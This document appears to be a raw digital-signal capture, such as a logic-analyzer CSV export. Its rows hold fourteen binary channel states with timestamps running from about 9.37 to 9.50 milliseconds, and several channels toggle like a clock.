1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3688840e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3689080e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3689320e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3689560e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3689840e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3690080e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3690360e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3690600e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3690840e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3691080e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3691320e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3691560e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3691840e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3692080e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3692360e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3692600e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3692840e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3693160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3693400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3693640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3693880e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3694120e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3694360e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3694640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3694880e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3695160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3695400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3695640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3695880e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3696120e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3696360e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3696640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3696880e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3697160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3697400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3697640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3697880e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3698120e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3698360e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3698640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3698880e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3699160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3699400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3699640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3699880e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3700120e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3700360e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3700640e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3700920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3701160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3701400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3701680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3701960e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3702200e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3702400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3702680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3702920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3703160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3703400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3703680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3703960e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3704200e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3704440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3704680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3704920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3705160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3705400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3705680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3705960e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3706200e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3706440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3706680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3706920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3707160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3707400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3707680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3707960e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3708200e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3708400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3708680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3708920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3709160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3709400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3709680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3709960e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3710200e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3710440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3710680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3710920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3711160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3711400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3711680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3711960e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3712200e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3712440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3712680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3712920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3713160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3713400e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3713680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3713960e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3714200e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3714440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3714680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3714920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3715160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3715440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3715680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3715960e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3716200e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3716440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3716680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3716920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3717160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3717440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3717680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3717960e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3718200e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3718440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3718680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3718920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3719160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3719440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3719680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3719960e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3720200e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3720440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3720680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3720920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3721160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3721440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3721680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3721960e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3722200e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3722440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3722680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3722920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3723160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3723440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3723680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3723960e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3724200e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3724440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3724680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3724920e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3725160e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3725440e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3725680e-03 1,1,1,0,1,0,0,0,0,0,0,0,1,0,9.3725960e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,0,9.3726200e-03 1,1,1,0,1,0,0,0,0,0,0,0,0,1,9.4973640e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,1,9.4975360e-03 0,0,0,0,1,0,0,0,0,0,0,0,0,1,9.4975400e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,9.4975560e-03 0,0,0,1,1,0,0,0,0,0,0,1,0,1,9.4975880e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,9.4976120e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,1,9.4979160e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,9.4979400e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,1,9.4979640e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,9.4979880e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,1,9.4980120e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,9.4980360e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,1,9.4980640e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,9.4980880e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,1,9.4981160e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,9.4981400e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,1,9.4981640e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,9.4981880e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4981960e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4982120e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4982360e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4982640e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4982880e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4983160e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4983400e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4983640e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4983880e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4984120e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4984360e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4984640e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4984880e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4985160e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4985400e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4985640e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4985880e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4986120e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4986360e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4986640e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4986880e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4987160e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4987400e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4987640e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4987880e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4988120e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4988360e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4988640e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4988880e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4989160e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4989400e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4989640e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4989880e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4990120e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4990360e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4990640e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4990880e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4991160e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4991400e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4991640e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4991880e-03 0,0,0,1,1,0,0,0,0,1,0,0,0,0,9.4991920e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,9.4991960e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,9.4992400e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,9.4992640e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4992720e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4992880e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,9.4993160e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,9.4993400e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,9.4993640e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,9.4993880e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,9.4994120e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,9.4994360e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,9.4994600e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,9.4994880e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,9.4995080e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,9.4995360e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,9.4995640e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,9.4996120e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,9.4996360e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4996440e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4996600e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4996880e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4997120e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4997360e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4997640e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4997880e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4998120e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4998360e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4998600e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4998880e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4999120e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4999360e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.4999640e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.4999880e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5000120e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5000360e-03 0,0,0,1,1,0,0,0,0,1,0,0,0,0,9.5000400e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,9.5000440e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,9.5000920e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,9.5001120e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5001240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5001360e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5001640e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5001880e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5002120e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5002360e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5002640e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5002880e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5003160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5003400e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5003640e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5003880e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5004120e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5004360e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5004640e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5004880e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5005160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5005400e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5005640e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5006120e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5006360e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,9.5006440e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,9.5006920e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,9.5007160e-03 0,0,0,1,1,1,0,0,0,0,0,0,0,0,9.5007200e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5007240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5007400e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5007640e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5007880e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5008120e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5008360e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5008640e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5008880e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5009160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5009400e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5009640e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5009880e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5010120e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5010360e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5010640e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5010880e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5011160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5011440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5011680e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5011960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5012200e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5012440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5012680e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5012920e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5013160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5013440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5013680e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5013960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5014200e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5014440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5014680e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5014920e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5015160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5015440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5015680e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5015960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5016200e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5016440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5016680e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5016920e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5017160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5017440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5017680e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5017960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5018200e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5018440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5018680e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5018920e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5019160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5019440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5019680e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5019960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5020200e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5020440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5020680e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5020920e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5021160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5021440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5021680e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5021960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5022200e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5022440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5022680e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5022920e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5023160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5023440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5023680e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5023960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5024200e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5024440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5024680e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5024920e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5025160e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5025440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5025680e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5025960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5026200e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5026440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5026680e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5026920e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5027200e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5027480e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5027720e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5027960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5028200e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5028440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5028760e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5029000e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5029240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5029480e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5029720e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5029960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5030200e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5030440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5030760e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5031000e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5031240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5031480e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5031720e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5031960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5032200e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5032440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5032760e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5033000e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5033200e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5033480e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5033720e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5033960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5034200e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5034440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5034760e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5035000e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5035240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5035480e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5035720e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5035960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5036240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5036440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5036760e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5037000e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5037240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5037480e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5037720e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5037960e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5038240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5038440e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5038760e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5039000e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5039240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,9.5039480e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,9.5039720e-03 